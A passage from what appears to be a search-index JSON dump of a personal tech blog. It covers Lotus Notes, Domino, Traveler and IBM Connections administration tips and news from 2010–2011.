Notes.\n","excerpt":"\u003cp\u003eToday i had problems to recreate my Activities Sidebar connection after\na Notes Client reinstall.\u003c/p\u003e\n\u003cp\u003eEach time when i want to connect, i got the following error message:\u003c/p\u003e\n\u003cp\u003eCannot connect to the Activities Server.\u003c/p\u003e\n\u003cp\u003eEither the URL is incorrect, the server is down, or a firewall may be\npreventing you from reaching the server. Check the URL, your firewall\nsettings and the server status and try again.”\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2011/04/2011-04-11_10-58-19.png\" alt=\"Error message when testing connection to IBM Connections Activities\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e\n\u003cp\u003eWhen i use the credentials in my browser or the integrated Notes\nbrowser, i could login, so server is responding and credentials were ok.\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-04-11-weird-problem-with-lotus-connections-activities-integration-in-notes-client/","title":"Weird problem with Lotus Connections Activities Integration in Notes Client"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/firefox/","title":"Firefox"},{"body":"There is a new interim Fix for Lotus Domino 8.5.2 FP2 to get Firefox 4 working with iNotes.\nFirefox 4 support availability for Lotus iNotes – By Ulrich Krause – eknori.de .\n","excerpt":"\u003cp\u003eThere is a new interim Fix for Lotus Domino 8.5.2 FP2 to get Firefox 4\nworking with iNotes.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www.eknori.de/2011-04-05/firefox-4-support-availability-for-lotus-inotes/\" target=\"_blank\"\u003eFirefox\n4 support availability for Lotus iNotes – By Ulrich Krause – eknori.de \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-04-06-firefox-4-support-availability-for-lotus-inotes-by-ulrich-krause-eknori-de/","title":"Firefox 4 support availability for Lotus iNotes – By Ulrich Krause – eknori.de"},{"body":"Here it is! IBM Connections 3.0.1 announced today! .\nvia Synch.rono.us Electronic Availability on 7th of april.\nUpdate – Youtube Video showing the new features ","excerpt":"\u003cp\u003e\u003ca href=\"http://synch.rono.us/social/blog.nsf/dx/301.htm\" target=\"_blank\"\u003eHere it is! IBM\nConnections 3.0.1 announced today! \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003evia \u003ca href=\"http://synch.rono.us\" target=\"_blank\"\u003eSynch.rono.us \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003eElectronic Availability on 7th of april.\u003c/p\u003e\n\u003ch1 id=\"update--youtube-video-showing-the-new-features\"\u003eUpdate – Youtube Video showing the new features \u003ca href=\"#update--youtube-video-showing-the-new-features\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e","ref":"https://stoeps.de/posts/2011/2011-04-05-here-it-is-ibm-connections-3-0-1-announced-today/","title":"Here it is! IBM Connections 3.0.1 announced today – Update"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/designer/","title":"Designer"},{"body":"Nathan T Freeman published a new release and project on OpenNTF.org .\nThe project offers Git support for IBM Lotus Domino Designer! Thanks a lot.\nIt would be great, when we could use it too for Lotus Administrator to get track of configuration changes in different databases like the Domino Directory.\nESCAPE VELOCITY :: New OpenNTF.org project .\n","excerpt":"\u003cp\u003eNathan T Freeman published a new release and project on\n\u003ca href=\"http://www.openntf.org\" target=\"_blank\"\u003eOpenNTF.org \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eThe\n\u003ca href=\"http://www.openntf.org/internal/home.nsf/project.xsp?action=openDocument\u0026amp;name=EGit%20for%20IBM%20Domino%20Designer\" target=\"_blank\"\u003eproject \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\noffers \u003ca href=\"http://git-scm.com/\" target=\"_blank\"\u003eGit \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n support for IBM Lotus Domino Designer!\nThanks a lot.\u003c/p\u003e\n\u003cp\u003eIt would be great, when we could use it too for Lotus Administrator to\nget track of configuration changes in different databases like the\nDomino Directory.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://ntf.gbs.com/nathan/escape.nsf/d6plinks/NTFN-8FFSD4\" target=\"_blank\"\u003eESCAPE\nVELOCITY :: New OpenNTF.org project \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-04-03-escape-velocity-new-openntf-org-project-git-for-lotus-domino-designer/","title":"ESCAPE VELOCITY New OpenNTF.org project – Git for Lotus Domino Designer"},{"body":"With last update vor Lotus Traveler 8.5.2.2 there came a new feature for Android devices. You can read and send encrypted mails and you can sign mails with your notes id.\nYou can click on details in new mails, there you find the new checkboxes for encrypt or sign.\nLong needed feature and it works better than Lotus Companion App on iPhone, because the id password is cached for a short time.\nUpdate After some testing i wrote down some points on this new feature.\nFirst of all i asked me, why i didn’t read anything about it. I found no document on IBM, which announces encryption on Android before 8.5.3. On my search i found a post in the Domino 8.5 Forum , which describes the new feature too. So why did nobody blog or announce it?\nI have a test machine which is installed like described in the Traveler documention. I used a second Domain and Organization, so i can make more frequent updates and do not disturb our production environment.\nBut:\nI can’t use the new policies, because they aren’t in my production directory.\nI can’t use ID Vault for encryption in Lotus Traveler, because the Traveler server isn’t allowed to download the ids. I found no way to get this working and no speaking log messages.\nI think somebody should add these points to the official documentation.\nIn the moment i have no idea, how long the password is cached! My unencrypted messages stay unecrypted.\nBut i’m very impressed on the new feature, because the traveler implementation is only a few months old, but the functionality is better now than on the iPhone.\n","excerpt":"\u003cp\u003eWith last update vor Lotus Traveler 8.5.2.2 there came a new feature for\nAndroid devices. You can read and send encrypted mails and you can sign\nmails with your notes id.\u003c/p\u003e\n\u003cp\u003eYou can click on details in new mails, there you find the new checkboxes\nfor encrypt or sign.\u003c/p\u003e\n\u003cp\u003eLong needed feature and it works better than Lotus Companion App on\niPhone, because the id password is cached for a short time.\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2011/03/2011-03-17_2138.png\" alt=\"2011 03 17 2138\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e\n\u003ch1 id=\"update\"\u003eUpdate \u003ca href=\"#update\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eAfter some testing i wrote down some points on this new feature.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eFirst of all i asked me, why i didn’t read anything about it. I found\nno document on IBM, which announces encryption on Android before 8.5.3.\nOn my search i found a\n\u003ca href=\"http://www-10.lotus.com/ldd/nd85forum.nsf/DateAllFlatWeb/a5b17aa4b1ea4a998525785500558f8f?OpenDocument\" target=\"_blank\"\u003epost\nin the Domino 8.5 Forum \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, which describes the new feature too. So why\ndid nobody blog or announce it?\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-03-17-lotus-traveler-8-5-2-2-implements-mail-encryption-for-android-devices/","title":"Lotus Traveler 8.5.2.2 implements mail encryption for Android devices"},{"body":"Installed it on android. Functions are ok, but i found no way to hide offline contacts.\nAfter all it is the first sametime client in the marketplace and gives me the possibility to chat with my colleagues.\nhttp://schmhen.wordpress.com/2011/03/14/sametime-client-for-iphone-and-android-available/ ","excerpt":"\u003cp\u003eInstalled it on android. Functions are ok, but i found no way to hide\noffline contacts.\u003c/p\u003e\n\u003cp\u003eAfter all it is the first sametime client in the marketplace and gives\nme the possibility to chat with my colleagues.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://schmhen.wordpress.com/2011/03/14/sametime-client-for-iphone-and-android-available/\" target=\"_blank\"\u003ehttp://schmhen.wordpress.com/2011/03/14/sametime-client-for-iphone-and-android-available/ \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-03-15-schmhens-blog-sametime-client-for-android-and-iphone/","title":"schmhen’s Blog: Sametime Client for Android and iPhone"},{"body":"New feature in 8.5.2 is synchronizing of sent as an imap folder. Article describes the way to deploy and give some hints.\nNotes.ini setting to enable: EnableImapFolderSynch=1\nhttp://www.dominopower.com/newsitems/00052856.html ","excerpt":"\u003cp\u003eNew feature in 8.5.2 is synchronizing of sent as an imap folder. Article\ndescribes the way to deploy and give some hints.\u003c/p\u003e\n\u003cp\u003eNotes.ini setting to enable: EnableImapFolderSynch=1\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www.dominopower.com/newsitems/00052856.html\" target=\"_blank\"\u003ehttp://www.dominopower.com/newsitems/00052856.html \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-03-15-new-article-imap-folders-synching-with-notes-views-in-domino-8-5-2/","title":"New article: IMAP folders synching with Notes views in Domino 8.5.2"},{"body":"Because i had several issues with automated renewed ssl and ltpa keys on my websphere servers, i found this article on the blog of Mitch Cohen : http://www.curiousmitch.com/2009/06/disabling-automatic-ltpa-key-generation-in-was-or-how-to-stopsso-between-was-and-domino-from-breaking/ Perhaps this is interesting for more people.\n","excerpt":"\u003cp\u003eBecause i had several issues with automated renewed ssl and ltpa keys on\nmy websphere servers, i found this article on the blog of\n\u003ca href=\"http://www.curiousmitch.com\" target=\"_blank\"\u003eMitch Cohen \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n:\n\u003ca href=\"http://www.curiousmitch.com/2009/06/disabling-automatic-ltpa-key-generation-in-was-or-how-to-stopsso-between-was-and-domino-from-breaking/\" target=\"_blank\"\u003ehttp://www.curiousmitch.com/2009/06/disabling-automatic-ltpa-key-generation-in-was-or-how-to-stopsso-between-was-and-domino-from-breaking/ \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003ePerhaps this is interesting for more people.\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-03-03-websphere-application-server-automatic-key-rollover/","title":"Websphere Application Server – Automatic Key Rollover"},{"body":"You can use policy setting document “Mail settings” to deploy a standard message disclaimer for your users.\nFirst you have to configure your domino server which makes the smtp conversion of internet mails. For this server open the “configuration document” and check if “Message disclaimers” is enabled.\nNow we need a policy for all traveler users, or if you want to deploy personalized signatures, for each traveler user.\nI created a dynamic policy (explicit policy document and set of group/user in “policy assignment”) for my traveler user and made a mail setting document for the disclaimer:\n“Notes client can add disclaimer” to disabled: So the server will append/prepend the disclaimer text. This is important, because the traveler client don’t act as a notes client, so it is the only way to deploy a disclaimer text with domino tools on traveler.\nAppend will set your disclaimer text to top of your mail, and prepend on the bottom.\nMail and Traveler settings are applied to mail files on the server by the Administration Process every 12 hours by default. Adminp can be triggered on the server console: “tell adminp process mailpolicy” or “tell adminp process traveler”.\nOr you change the notes.ini value ADMINP_POLL_INTERVALL=(time in minutes), that adminp process these settings more often.\n","excerpt":"\u003cp\u003eYou can use policy setting document “Mail settings” to deploy a standard\nmessage disclaimer for your users.\u003c/p\u003e\n\u003cp\u003eFirst you have to configure your domino server which makes the smtp\nconversion of internet mails. For this server open the “configuration\ndocument” and check if “Message disclaimers” is enabled.\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2011/02/2011-02-28_12281.png\" alt=\"2011 02 28 12281\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e\n\u003cp\u003eNow we need a policy for all traveler users, or if you want to deploy\npersonalized signatures, for each traveler user.\u003c/p\u003e\n\u003cp\u003eI created a dynamic policy (explicit policy document and set of\ngroup/user in “policy assignment”) for my traveler user and made a mail\nsetting document for the disclaimer:\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-02-28-manage-message-signatures-with-lotus-notes-traveler/","title":"Manage message signatures with Lotus Notes Traveler"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/policy/","title":"Policy"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/traveler/","title":"Traveler"},{"body":"Finally i managed to install Connections 3 on Ubuntu Server, but i didn’t got a one machine setup running.\nMy idea was a demo install for testing issues. I can’t find DB2 32-Bit for Linux, so i decided to use Ubuntu 64 Bit and all other components 64 Bit. I got error after enabling ssl on IHS, because the ssl Plugin wasn’t found.\nI think that the .so file is 32 bit and can’t work with 64 bit Linux.\nSo i make a two machine setup. One 64 bit ubuntu vm with db2 9.7 and tdi 7 64 bit\nOther machine is 32 bit and host Websphere Application Server, IHS and Connections\nAnd again. To be continued …\n","excerpt":"\u003cp\u003eFinally i managed to install Connections 3 on Ubuntu Server, but i\ndidn’t got a one machine setup running.\u003c/p\u003e\n\u003cp\u003eMy idea was a demo install for testing issues. I can’t find DB2 32-Bit\nfor Linux, so i decided to use Ubuntu 64 Bit and all other components 64\nBit. I got error after enabling ssl on IHS, because the ssl Plugin\nwasn’t found.\u003cbr\u003e\nI think that the .so file is 32 bit and can’t work with 64 bit Linux.\u003c/p\u003e\n\u003ch1 id=\"so-i-make-a-two-machine-setup\"\u003eSo i make a two machine setup. \u003ca href=\"#so-i-make-a-two-machine-setup\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eOne 64 bit ubuntu vm with db2 9.7 and tdi 7 64 bit\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-01-30-connections-3-on-ubuntu-some-news/","title":"Connections 3 on Ubuntu some news"},{"body":"Only some short news. I disabled comments after 28 days of article creation time. Secondly i installed a new contact form mailer, so you can send me additional infos to posts after this time with this form.\n","excerpt":"\u003cp\u003eOnly some short news. I disabled comments after 28 days of article\ncreation time. Secondly i installed a new contact form mailer, so you\ncan send me additional infos to posts after this time with this form.\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-01-23-contact-and-comments/","title":"Contact and comments"},{"body":"http://www.edbrill.com/ebrill/edbrill.nsf/dx/now-available-lotus-notes-traveler-for-android ","excerpt":"\u003cp\u003e\u003ca href=\"http://www.edbrill.com/ebrill/edbrill.nsf/dx/now-available-lotus-notes-traveler-for-android\" target=\"_blank\"\u003ehttp://www.edbrill.com/ebrill/edbrill.nsf/dx/now-available-lotus-notes-traveler-for-android \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-12-14-traveler-for-android-available/","title":"Traveler for Android available"},{"body":"Many people know, that i prefer Ubuntu for my testing environments and several production servers. So one of my first tries to install Lotus Connections 3.0 was on Ubuntu 10.04 LTS .\nBest thing in Ubuntu is the package management with aptitude or apt (First developed from Debian GNU/Linux Community ). It is easy to use and powerful in installation and upgrade processes.\nUbuntu 10.04 LTS Server Installation Installed Standard Server 64 Bit with OpenSSH , nothing else. After the first start i prepared network, dns and /etc/hosts.\nFirst hint: Ubuntu normaly includes a line in the /etc/hosts with 127.0.1.1 hostname. I got an error on the first Websphere Application Server start, so i changed this line to the ip address of my host and the hostname.\nAdditional packages I didn’t install a complete x-server environment. It works great with OpenSSH Server and xauth.\napt-get install xauth xterm ia32-libs vim-nox libaio1 libstdc++5 xauth, xterm: Minimal X-Server Environment\nia32-libs: Libraries for 32 Bit\nlibaio1: not shure if you need it, but i think so\nUpdate: libaio1 is needed from DB2 Installer\nlibstdc++5: Installation of Tivoli Directory Integrator don’t start without this lib\nRemap SH In Ubuntu /bin/sh links to dash, this makes a lot of troubles with IBM Software. You can change it with dpkg-reconfigure dash and answer the question with no, then /bin/sh links to bash.\nTest environment My demo installation are to vmware machines in Vmware Fusion. System1: Domino.stoeps.de (Domino Server, LDAP), System2: connections.stoeps.de (All in one installation: WAS, TDI, DB2, IHS, LCS).\nNetwork configuration Domino ]\nDomino works great with this fake loopback device in /etc/hosts:\n]\nConnections ]\nWAS will not start with fake loopback, so here the /etc/hosts:\n]\nInstallation Installation was pretty easy, when you know the installation process of connections 2.5. IBM made a lot of points simpler and i got only one error with the database wizard, but i could manage it with the sql scripts.\nto be continued … ","excerpt":"\u003cp\u003eMany people know, that i prefer Ubuntu for my testing environments and\nseveral production servers. So one of my first tries to install\n\u003ca href=\"http://www.ibm.com/software/lotus/products/connections/\" target=\"_blank\"\u003eLotus\nConnections \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n 3.0 was on\n\u003ca href=\"https://help.ubuntu.com/community/Server/TechSpecs/1004LTS\" target=\"_blank\"\u003eUbuntu 10.04\nLTS \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eBest thing in Ubuntu is the package management with aptitude or apt\n(First developed from \u003ca href=\"http://www.debian.org\" target=\"_blank\"\u003eDebian GNU/Linux\nCommunity \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n). It is easy to use and powerful in installation and upgrade\nprocesses.\u003c/p\u003e\n\u003ch1 id=\"ubuntu-1004-lts-server-installation\"\u003eUbuntu 10.04 LTS Server Installation \u003ca href=\"#ubuntu-1004-lts-server-installation\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eInstalled Standard Server 64 Bit with \u003ca href=\"http://www.openssh.org\" target=\"_blank\"\u003eOpenSSH \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n,\nnothing else. After the first start i prepared network, dns and\n/etc/hosts.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFirst hint:\u003c/strong\u003e Ubuntu normaly includes a line in the /etc/hosts with\n127.0.1.1 \u003cem\u003ehostname\u003c/em\u003e. I got an error on the first Websphere Application\nServer start, so i changed this line to the ip address of my host and\nthe hostname.\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-11-30-ibm-lotus-connections-3-0-on-ubuntu-server-10-04/","title":"IBM Lotus Connections 3.0 on Ubuntu Server 10.04"},{"body":"You can download Connections 3 now on Passport Advantage! In the moment i can’t find the images in the BP Software Access Catalog.\nUpdate:\nDownload is available in the Software Access Catalog now.\nSocialize Me: Lotus Connections 3.0 Available for Download .\n","excerpt":"\u003cp\u003eYou can download Connections 3 now on Passport Advantage! In the moment\ni can’t find the images in the BP Software Access Catalog.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eUpdate:\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eDownload is available in the Software Access Catalog now.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www.lbenitez.com/2010/11/lotus-connections-30-available-for.html\" target=\"_blank\"\u003eSocialize\nMe: Lotus Connections 3.0 Available for Download \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-11-24-socialize-me-lotus-connections-3-0-available-for-download/","title":"Socialize Me: Lotus Connections 3.0 Available for Download"},{"body":"Documentation is not populated in an Infocenter. There is a new wiki.\nHope this works better then the Traveler 8.5.2 wiki.\nhttp://www.curiousmitch.com/CuriousMitch/mitch2.nsf ","excerpt":"\u003cp\u003eDocumentation is not populated in an Infocenter. There is a new wiki.\u003c/p\u003e\n\u003cp\u003eHope this works better then the Traveler 8.5.2 wiki.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www.curiousmitch.com/CuriousMitch/mitch2.nsf\" target=\"_blank\"\u003ehttp://www.curiousmitch.com/CuriousMitch/mitch2.nsf \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-11-23-mitch-cohen-connections-3-documentation/","title":"Mitch Cohen – Connections 3 Documentation"},{"body":"Ed Brill – Lotus Notes Traveler for Android will be a holiday present .\nEd Brill anounced the shipping of Android Support in IBM Lotus Traveler.\n","excerpt":"\u003cp\u003e\u003ca href=\"http://www.edbrill.com/ebrill/edbrill.nsf/dx/lotus-notes-traveler-for-android-will-be-a-holiday-present\" target=\"_blank\"\u003eEd\nBrill – Lotus Notes Traveler for Android will be a holiday present \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eEd Brill anounced the shipping of Android Support in IBM Lotus Traveler.\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-11-23-ed-brill-lotus-notes-traveler-for-android-will-be-a-holiday-present/","title":"Ed Brill – Lotus Notes Traveler for Android will be a holiday present"},{"body":"In the Domino documentation of Security Settings there is a point, that you can add a link to the “Forgot your Password” prompt of the Notes client screen. Finally i tested this feature, because i can’t find any further information, how the code should look like.\nSo i created the security setting document for my users, with a link:\nThe result was a login screen with my html code in the textbox:\nWhen i wrote the html tags in capitals, the link is been generated. So remind, that you use capitals as tags.\nHere is my final example setting:\nOne more bug feature is, that the mouse cursor don’t change, when you hover over the link.\n","excerpt":"\u003cp\u003eIn the Domino documentation of Security Settings there is a point, that\nyou can add a link to the “Forgot your Password” prompt of the Notes\nclient screen. Finally i tested this feature, because i can’t find any\nfurther information, how the code should look like.\u003c/p\u003e\n\u003cfigure\u003e\u003ca href=\"/images/2010/09/login_ok.png\"\u003e\u003cimg src=\"/images/2010/09/login_ok.png\"\u003e\u003c/a\u003e\n\u003c/figure\u003e\n\n\u003cp\u003eSo i created the security setting document for my users, with a link:\u003c/p\u003e\n\u003cfigure\u003e\u003ca href=\"/images/2010/09/setting_notok.png\"\u003e\u003cimg src=\"/images/2010/09/setting_notok.png\"\u003e\u003c/a\u003e\n\u003c/figure\u003e\n\n\u003cp\u003eThe result was a login screen with my html code in the textbox:\u003c/p\u003e\n\u003cfigure\u003e\u003ca href=\"/images/2010/09/login_notok.png\"\u003e\u003cimg src=\"/images/2010/09/login_notok.png\"\u003e\u003c/a\u003e\n\u003c/figure\u003e\n\n\u003cp\u003eWhen i wrote the html tags in capitals, the link is been generated. So\nremind, that you use capitals as tags.\u003c/p\u003e\n\u003cp\u003eHere is my final example setting:\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-09-20-adding-a-link-to-forgot-your-password-prompt-in-notes-login-screen/","title":"Adding a Link to “Forgot your Password?” Prompt in Notes Login Screen"},{"body":"Volker wrote an article on using Lotus Notes privately and legal. One point is using it without a domino server connection. See original post: http://vowe.net/archives/011655.html Posted from WordPress for Android\n","excerpt":"\u003cp\u003eVolker wrote an article on using Lotus Notes privately and legal. One\npoint is using it without a domino server connection. See original post:\n\u003ca href=\"http://vowe.net/archives/011655.html\" target=\"_blank\"\u003ehttp://vowe.net/archives/011655.html \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003ePosted from WordPress for Android\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-08-17-using-lotus-notes-free-and-legal/","title":"Using Lotus Notes free and legal"},{"body":"http://feedproxy.google.com/ r/netways/3/PTeIDeaSRYo/\nPosted from WordPress for Android\n","excerpt":"\u003cp\u003e\u003ca href=\"http://feedproxy.google.com/\" target=\"_blank\"\u003ehttp://feedproxy.google.com/ \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003csub\u003er/netways/\u003c/sub\u003e3/PTeIDeaSRYo/\u003c/p\u003e\n\u003cp\u003ePosted from WordPress for Android\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-08-01-private-cloud-just-computers/","title":"Private Cloud – just computers"},{"body":"http://www.bleedyellow.com/blogs/lotusnut/entry/moresecurehttppassword?lang=en_us Posted from WordPress for Android\n","excerpt":"\u003cp\u003e\u003ca href=\"http://www.bleedyellow.com/blogs/lotusnut/entry/moresecurehttppassword?lang=en_us\" target=\"_blank\"\u003ehttp://www.bleedyellow.com/blogs/lotusnut/entry/moresecurehttppassword?lang=en_us \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003ePosted from WordPress for Android\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-07-16-more-secure-httppassword-on-domino/","title":"More secure httppassword on Domino"},{"body":"Now with Mac and Linux Support!\nhttp://www.openntf.org/Projects/pmt.nsf/HomeLookup/45E037507A3781298625776200215C74 ]1 ","excerpt":"\u003cp\u003eNow with Mac and Linux Support!\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www.openntf.org/Projects/pmt.nsf/HomeLookup/45E037507A3781298625776200215C74\" target=\"_blank\"\u003ehttp://www.openntf.org/Projects/pmt.nsf/HomeLookup/45E037507A3781298625776200215C74 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n]\u003ca href=\"http://www.openntf.org/Projects/pmt.nsf/HomeLookup/45E037507A3781298625776200215C74\" target=\"_blank\"\u003e1 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-07-16-new-version-1-4-of-wildfire-on-openntf-2/","title":"New Version 1.4 of Wildfire on Openntf"},{"body":"Here you can find two ideas of http://www.ideajam.net , which i support and i want to ask you, that you support them too.\n","excerpt":"\u003cp\u003eHere you can find two ideas of \u003ca href=\"http://www.ideajam.net\" target=\"_blank\"\u003ehttp://www.ideajam.net \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, which i support\nand i want to ask you, that you support them too.\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-07-11-ideajam-please-support-ts-and-xenapp-6/","title":"Ideajam: please support TS and Xenapp 6"},{"body":"Domino Power Magazine: Setting IHS Default to be Connections Homepage Update On my Connections 2.5 Install i had no success with this tipp! I don’t know why, but i don’t get forwarded.\n","excerpt":"\u003cp\u003e\u003ca href=\"http://www.dominopower.com/newsitems/00049664.html\" target=\"_blank\"\u003eDomino Power\nMagazine: Setting IHS Default to be Connections Homepage \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003ch1 id=\"update\"\u003eUpdate \u003ca href=\"#update\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eOn my Connections 2.5 Install i had no success with this tipp! I don’t\nknow why, but i don’t get forwarded.\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-07-05-setting-ihs-default-to-connections-homepage-2/","title":"Setting IHS Default to Connections Homepage"},{"body":"Bleedyellow: Are you still having Winmail.dat issues .\n","excerpt":"\u003cp\u003e\u003ca href=\"http://www.bleedyellow.com/blogs/NotesShop/entry/are_you_still_having_winmail_dat_issues7?lang=en_us\u0026amp;utm_source=twitterfeed\u0026amp;utm_medium=twitter\" target=\"_blank\"\u003eBleedyellow:\nAre you still having Winmail.dat issues \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n .\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-07-05-avoiding-winmail-dat-issues/","title":"Avoiding winmail.dat issues"},{"body":"DominoPower Magazine: Setting IHS Default to be Connections Homepage ","excerpt":"\u003cp\u003e\u003ca href=\"http://www.dominopower.com/newsitems/00049664.html\" target=\"_blank\"\u003eDominoPower Magazine:\nSetting IHS Default to be Connections Homepage \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-07-02-setting-ihs-default-to-connections-homepage/","title":"Setting IHS Default to Connections Homepage"},{"body":"On Daniel Nasheds Blog you can read about timeout issues with iOS4 and Traveler 8.5.2 Beta:\nTraveler with iPhone iOS4 timing issues ","excerpt":"\u003cp\u003eOn Daniel Nasheds Blog you can read about timeout issues with iOS4 and\nTraveler 8.5.2 Beta:\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://blog.nashcom.de/nashcomblog.nsf/dx/traveler-with-iphone-ios4-timing-issues.htm\" target=\"_blank\"\u003eTraveler\nwith iPhone iOS4 timing issues \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-06-25-nashcom-traveler-timeouts-with-ios4/","title":"Nashcom: Traveler timeouts with iOS4"},{"body":"Here you can read closed SPR and Fixes: Lotus iNotes Interim Fix 304.5aCHF1 for Domino 8.5.1 Fix Pack 3 ","excerpt":"\u003cp\u003eHere you can read closed SPR and Fixes:\n\u003ca href=\"http://www.ibm.com/support/docview.wss?uid=swg21438583\u0026amp;myns=swglotus\u0026amp;mynp=OCSSULMR\u0026amp;mynp=OCSSKTMJ\u0026amp;mync=R\" target=\"_blank\"\u003eLotus\niNotes Interim Fix 304.5aCHF1 for Domino 8.5.1 Fix Pack 3 \u003ci class=\"las la-external-link-alt 